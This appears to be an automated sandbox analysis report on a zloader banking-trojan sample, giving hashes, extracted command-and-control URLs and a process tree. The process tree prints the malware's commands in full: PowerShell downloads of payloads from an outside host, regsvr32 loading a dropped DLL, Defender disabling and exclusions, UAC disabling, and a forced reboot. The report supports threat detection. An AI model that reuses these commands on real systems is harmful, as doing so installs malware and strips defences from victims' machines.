zloader | 892ec03552cca2c62495e661fda9bfd113009f2d9b0a07c2b13d9f047953cb2f

Analysis

max time kernel
65s
max time network
156s
platform
windows10_x64
resource
win10v20210408
submitted
09-08-2021 04:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3740851312af7f75741d950015901cb7.exe
Size

165KB
MD5

3740851312af7f75741d950015901cb7
SHA1

f80ae1f66de60f5c42cfbc555be1dfb291cd6d5a
SHA256

892ec03552cca2c62495e661fda9bfd113009f2d9b0a07c2b13d9f047953cb2f
SHA512

e3c2a268e86521510e97b719e94ea64cfd4b716bcbd2eed7d896598d694a8cb5445e53f70fc0fcf4863c550bb0b3381b610a10477254febc1d45ef90607eefce

Score

10^/10

zloader vasja vasja botnet persistence trojan

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain

rsa_pubkey.plain

Signatures

Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

8 1568 powershell.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

2556 regsvr32.exe

flow	pid	process
8	1568	powershell.exe

pid	process
2556	regsvr32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

3740851312af7f75741d950015901cb7.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	3740851312af7f75741d950015901cb7.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	3740851312af7f75741d950015901cb7.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

1568 powershell.exe
1568 powershell.exe
1568 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1568 powershell.exe

pid	process
1568	powershell.exe
1568	powershell.exe
1568	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1568	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

3740851312af7f75741d950015901cb7.execmd.exeregsvr32.exe

description	pid	process	target process
PID 580 wrote to memory of 1156	580	3740851312af7f75741d950015901cb7.exe	cmd.exe
PID 580 wrote to memory of 1156	580	3740851312af7f75741d950015901cb7.exe	cmd.exe
PID 1156 wrote to memory of 1568	1156	cmd.exe	powershell.exe
PID 1156 wrote to memory of 1568	1156	cmd.exe	powershell.exe
PID 1156 wrote to memory of 2288	1156	cmd.exe	regsvr32.exe
PID 1156 wrote to memory of 2288	1156	cmd.exe	regsvr32.exe
PID 2288 wrote to memory of 2556	2288	regsvr32.exe	regsvr32.exe
PID 2288 wrote to memory of 2556	2288	regsvr32.exe	regsvr32.exe
PID 2288 wrote to memory of 2556	2288	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\3740851312af7f75741d950015901cb7.exe
"C:\Users\Admin\AppData\Local\Temp\3740851312af7f75741d950015901cb7.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:580

C:\Windows\SYSTEM32\cmd.exe
cmd /c start.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/JavaE.dll -OutFile JavaE.dll
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Windows\system32\regsvr32.exe
regsvr32 JavaE.dll
3⤵
- Suspicious use of WriteProcessMemory
PID:2288

C:\Windows\SysWOW64\regsvr32.exe
JavaE.dll
4⤵
- Loads dropped DLL
PID:2556

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
5⤵
PID:2564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/nsudo.bat -OutFile nsudo.bat
3⤵
PID:3756

C:\Windows\system32\cmd.exe
cmd /c nsudo.bat
3⤵
PID:2700

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
4⤵
PID:2576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/javase.exe -OutFile javase.exe
4⤵
PID:1448

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
4⤵
PID:2144

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T sc config WinDefend start= disabled
4⤵
PID:3932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"
4⤵
PID:904

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
4⤵
PID:3172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
4⤵
PID:2076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
4⤵
PID:1000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""
4⤵
PID:2576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""
4⤵
PID:4020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/autorun100.bat -OutFile autorun100.bat
4⤵
PID:736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
4⤵
PID:2708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
4⤵
PID:516

C:\Windows\system32\shutdown.exe
shutdown.exe /r /f /t 00
4⤵
PID:2212

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3ad1055 /state1:0x41c64e6d
1⤵
PID:3996

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
ef4dd46632341f2845a4efbe6df2c568

SHA1
99457458ed3bd78d99f6c7151a04258f88ec6c40

SHA256
8228d8e5d3cc653ebb737afe68a79475f5868730c8efb6adf7da868420656958

SHA512
abe2eedc1217ae2382b6bb1662a7fba492584a517b355fa124285b908e3a892a048f0d21406f4bea3a61286f70b5607bc504f19507535d0ce6f583ed37c217ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a32523fea45b4f108e17d32bbbd8c10b

SHA1
aad98f849d5f1eb27304e6e1015ccbe43659515a

SHA256
f116af8c46042f2687942a5d3d6a459316dd57be91368c7199c02d8f0ea1c06b

SHA512
da679607637229d98ec2bdf42d45190eba4a104595b7d043af3a249cd8a8f1fdae09f8762db83c4cbbd509dd2109b0fe37259adb8e9bd32d39ee807e63a355b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
236229008a9b5b32dc73f0f5c65f8971

SHA1
385974a5e1bd336a186c7f1cf1d3e49cb6414c2b

SHA256
ef2f63476898e0d76b21ca6b05358c9a48ed8388d6533eb5d13b859e5643d767

SHA512
08b26c7c604b04e00b28b5a4dde93e662124591fd1d0fb35bc4ade831aff61061a113aa17ed79399c1496bb65706866bbaaf5bcfd06e26e487939229a42e83ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
d1e7878fea7468232f33240aae33d98a

SHA1
3f6f0ebe45d746c755006da08edccf5ae72858a8

SHA256
8e04d88a0fdcaef0b8c9ad85a7f4eae5d8ef6b4c8b0c5e3a8554f90b7051eda8

SHA512
ed1d8307a34f949f834b513c866f58b7362de51f2f2518aabcdaf0f3041748542d9c470e6aab4cf7b303d37124469b6ac788b1722033bc95c0860ca2c7593b93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
61758a6a5e07410bda62fbc1454373de

SHA1
df38cb090943799ba9fcba6be5ba43b210b5df78

SHA256
966140f88b5d134d79b26f9159f4dcda3bd8e09984c0c6a5ef24cc19b5c35950

SHA512
e88e4c87c49d76341d20aa79904ce9900dd2ebb3ee4c1ce806b9e838c7eac00c85f128fc47ffb3b165ad1afa37925cca8fba868c94142e4e2b0c60e2bc3c8f17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
30f72731c54d29ec4c8bf9bf32abf8b0

SHA1
9bb3cf7195fc15163e63253a2bdb2e00ea8c16e3

SHA256
b85d4aa5c5ff5d1d5b44d0c374e4a691639bec65fb7a255787a07da70eac64db

SHA512
465d5651093f25e158e2222b8cbb1b00dee3e0c1a0a3323ffeeba56495bb364bf8dc47be5c192d288366e1713c25eefc8210ea55455f9750465e9114a9f5b1a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
753624aee94569fbef317dc3f8c8e248

SHA1
c5fbef3041334dc06533ccaeb9c7fd73cbf3f916

SHA256
9974137f1f54f88b130651cfde148c20f6cc149fe557368fb3d411c0b449d1d6

SHA512
14cb9f56ff64a679b41bbb7b162d473860595b46a794681824b6fd9609165df904e724608d677ab79c2fe83bf34d639cf4c6a409d32020ae5274000b4db0a76a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
56452f79ea5eac23184abe54a07691bd

SHA1
5533a8b1ea39ddddf8b00be0b07037ff12cefaac

SHA256
0351e443d10bf29272d7f1a2743247913818d26429cda028d857bd7369edf285

SHA512
a173739c40e39c899c1815a246ac40f91d02fde0b219fd32e0d019d539e158054adb7859a9de20f20b3716cb843dc477fb81d816c027ef9a7cbaf3313e905a0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
5598dd7ea0b7a1f8ae264ddb73719b71

SHA1
2bce56be3d08d0a95557ab4370f4e170d69ba142

SHA256
5d8ad03bc98a969a0b4332dc16e4ead9276bd9f2f1e720b3fff7e27c974fdb99

SHA512
27d5782643915dc974dc66a3bcb60f24c54d3468870c4a0932f9bec1b13701c125956871dd59b796cfe13dfef7892ff068f7d8742aa71589ad85cea37c8e9a9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
c5de35d3058c873e41ec80a20261751b

SHA1
050c74be74c0132bc83f1558aeba86ed29e559d9

SHA256
218613be3e113e7b511f95a4158af5ee8d8276f3f13870dff1b1a7e208d3efc6

SHA512
de8fcf8d6413ce5683136b7941398788390a27bd38f22aac1bf959de018d57a3047347045f131545dcd391adc72c10ededf3346f8ff28b67de13472a9eaa7d56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
9fc695279cd8365f4005de0d24b0cc0e

SHA1
3672d7d5e13088baa01b149e61c43c4b25901283

SHA256
72aa50db708b0cad949e3e92203ac5f5ca4b5b9c63ffa96c8c28c7ba45f63a33

SHA512
1b9576feca7b6bc6f63cc0fda0a5e6a78e2847253764706d24f439146ccee29e1e69055e20d0084a2fe005ea56ca6a401fabbcd42b80e87357f3b1ed4098ea08

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
MD5
80fb5a808f313c580a5ca87a368cfd9a

SHA1
ee8de66c9ad52965a99e0694523281a5f2b3b7ae

SHA256
bd1dda480fc500c13ec266ea4116d45dd658a314e1eff5bb052f0ee43a78300e

SHA512
a3e26e8a23eb0c6b9f990758543b60a2328db0c8261538a2bfc4722ecf70efa6d44088925e30bf6ecf8e3a1beeebbc7ccb8f2a1de6ddee2164674bad553970d7

Download Submit
C:\Users\Admin\AppData\Roaming\JavaE.dll
MD5
c43c3c195e838ef81a36c1434fa7395c

SHA1
c9accdc1204579d13440df22e4892fcc2082dc7c

SHA256
24c57cf9a9fd72827ced5f95796cf333089f076c660bf06b5e7d071a4d5fc102

SHA512
5ec2613176ddf8ca9ae331823cb7b62d436ea007850e60a9aeeee0bf23c827a2e3c1eb422594bdd3ec4c86f7688d91f3e8a3c6b2435c46078069c53947a1739f

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\nsudo.bat
MD5
fd279e5a6bb1510406eee2a4c312e44e

SHA1
adb538eedadebff7c294b27951e293e24084b151

SHA256
e72131936fa9377ca3df27e876cc1f0624800e608bbe662cabf388dff7bc89db

SHA512
1d2e91e573e3a795c4572f9233b6fcaa4e51de500fc50a16693161e17194e46e1ef0e73280abc18a1dd348a4c44049e1361b17bd7f3786a5204fd08f686367ae

Download Submit
\Users\Admin\AppData\Roaming\JavaE.dll
MD5
c43c3c195e838ef81a36c1434fa7395c

SHA1
c9accdc1204579d13440df22e4892fcc2082dc7c

SHA256
24c57cf9a9fd72827ced5f95796cf333089f076c660bf06b5e7d071a4d5fc102

SHA512
5ec2613176ddf8ca9ae331823cb7b62d436ea007850e60a9aeeee0bf23c827a2e3c1eb422594bdd3ec4c86f7688d91f3e8a3c6b2435c46078069c53947a1739f

Download Submit
memory/516-497-0x000002B85C9D3000-0x000002B85C9D5000-memory.dmp

Filesize
8KB

Download
memory/516-528-0x000002B85C9D8000-0x000002B85C9D9000-memory.dmp

Filesize
4KB

Download
memory/516-496-0x000002B85C9D0000-0x000002B85C9D2000-memory.dmp

Filesize
8KB

Download
memory/516-484-0x0000000000000000-mapping.dmp

Download
memory/516-525-0x000002B85C9D6000-0x000002B85C9D8000-memory.dmp

Filesize
8KB

Download
memory/736-443-0x0000000000000000-mapping.dmp

Download
memory/736-459-0x000001AB87F80000-0x000001AB87F82000-memory.dmp

Filesize
8KB

Download
memory/736-460-0x000001AB87F83000-0x000001AB87F85000-memory.dmp

Filesize
8KB

Download
memory/736-461-0x000001AB87F86000-0x000001AB87F88000-memory.dmp

Filesize
8KB

Download
memory/904-218-0x0000014F74D06000-0x0000014F74D08000-memory.dmp

Filesize
8KB

Download
memory/904-217-0x0000014F74D03000-0x0000014F74D05000-memory.dmp

Filesize
8KB

Download
memory/904-216-0x0000014F74D00000-0x0000014F74D02000-memory.dmp

Filesize
8KB

Download
memory/904-203-0x0000000000000000-mapping.dmp

Download
memory/1000-361-0x000001E748798000-0x000001E748799000-memory.dmp

Filesize
4KB

Download
memory/1000-344-0x000001E748796000-0x000001E748798000-memory.dmp

Filesize
8KB

Download
memory/1000-342-0x000001E748793000-0x000001E748795000-memory.dmp

Filesize
8KB

Download
memory/1000-341-0x000001E748790000-0x000001E748792000-memory.dmp

Filesize
8KB

Download
memory/1000-322-0x0000000000000000-mapping.dmp

Download
memory/1156-114-0x0000000000000000-mapping.dmp

Download
memory/1448-197-0x000001DD9DD36000-0x000001DD9DD38000-memory.dmp

Filesize
8KB

Download
memory/1448-186-0x000001DD9DD33000-0x000001DD9DD35000-memory.dmp

Filesize
8KB

Download
memory/1448-185-0x000001DD9DD30000-0x000001DD9DD32000-memory.dmp

Filesize
8KB

Download
memory/1448-175-0x0000000000000000-mapping.dmp

Download
memory/1568-134-0x000002AFFBC86000-0x000002AFFBC88000-memory.dmp

Filesize
8KB

Download
memory/1568-125-0x000002AFFC8B0000-0x000002AFFC8B1000-memory.dmp

Filesize
4KB

Download
memory/1568-116-0x0000000000000000-mapping.dmp

Download
memory/1568-121-0x000002AFFBC00000-0x000002AFFBC01000-memory.dmp

Filesize
4KB

Download
memory/1568-132-0x000002AFFBC80000-0x000002AFFBC82000-memory.dmp

Filesize
8KB

Download
memory/1568-133-0x000002AFFBC83000-0x000002AFFBC85000-memory.dmp

Filesize
8KB

Download
memory/2076-282-0x0000000000000000-mapping.dmp

Download
memory/2076-296-0x000002D849553000-0x000002D849555000-memory.dmp

Filesize
8KB

Download
memory/2076-297-0x000002D849556000-0x000002D849558000-memory.dmp

Filesize
8KB

Download
memory/2076-321-0x000002D849558000-0x000002D849559000-memory.dmp

Filesize
4KB

Download
memory/2076-295-0x000002D849550000-0x000002D849552000-memory.dmp

Filesize
8KB

Download
memory/2144-199-0x0000000000000000-mapping.dmp

Download
memory/2212-527-0x0000000000000000-mapping.dmp

Download
memory/2288-139-0x0000000000000000-mapping.dmp

Download
memory/2556-144-0x0000000010000000-0x0000000010155000-memory.dmp

Filesize
1.3MB

Download
memory/2556-141-0x0000000000000000-mapping.dmp

Download
memory/2556-143-0x0000000002CE0000-0x0000000002CE1000-memory.dmp

Filesize
4KB

Download
memory/2564-145-0x0000000000000000-mapping.dmp

Download
memory/2564-164-0x0000000001000000-0x0000000001026000-memory.dmp

Filesize
152KB

Download
memory/2576-399-0x0000027653FF6000-0x0000027653FF8000-memory.dmp

Filesize
8KB

Download
memory/2576-376-0x0000027653FF3000-0x0000027653FF5000-memory.dmp

Filesize
8KB

Download
memory/2576-408-0x0000027653FF8000-0x0000027653FF9000-memory.dmp

Filesize
4KB

Download
memory/2576-374-0x0000027653FF0000-0x0000027653FF2000-memory.dmp

Filesize
8KB

Download
memory/2576-362-0x0000000000000000-mapping.dmp

Download
memory/2576-174-0x0000000000000000-mapping.dmp

Download
memory/2700-171-0x0000000000000000-mapping.dmp

Download
memory/2708-495-0x0000027164556000-0x0000027164558000-memory.dmp

Filesize
8KB

Download
memory/2708-479-0x0000027164550000-0x0000027164552000-memory.dmp

Filesize
8KB

Download
memory/2708-466-0x0000000000000000-mapping.dmp

Download
memory/2708-480-0x0000027164553000-0x0000027164555000-memory.dmp

Filesize
8KB

Download
memory/3172-279-0x000001142FCA6000-0x000001142FCA8000-memory.dmp

Filesize
8KB

Download
memory/3172-242-0x0000000000000000-mapping.dmp

Download
memory/3172-255-0x000001142FCA0000-0x000001142FCA2000-memory.dmp

Filesize
8KB

Download
memory/3172-256-0x000001142FCA3000-0x000001142FCA5000-memory.dmp

Filesize
8KB

Download
memory/3172-281-0x000001142FCA8000-0x000001142FCA9000-memory.dmp

Filesize
4KB

Download
memory/3756-166-0x0000021A87C13000-0x0000021A87C15000-memory.dmp

Filesize
8KB

Download
memory/3756-172-0x0000021A87C16000-0x0000021A87C18000-memory.dmp

Filesize
8KB

Download
memory/3756-165-0x0000021A87C10000-0x0000021A87C12000-memory.dmp

Filesize
8KB

Download
memory/3756-148-0x0000000000000000-mapping.dmp

Download
memory/3932-201-0x0000000000000000-mapping.dmp

Download
memory/4020-444-0x000001E22A278000-0x000001E22A279000-memory.dmp

Filesize
4KB

Download
memory/4020-421-0x000001E22A276000-0x000001E22A278000-memory.dmp

Filesize
8KB

Download
memory/4020-410-0x000001E22A273000-0x000001E22A275000-memory.dmp

Filesize
8KB

Download
memory/4020-409-0x000001E22A270000-0x000001E22A272000-memory.dmp

Filesize
8KB

Download
memory/4020-403-0x0000000000000000-mapping.dmp

Download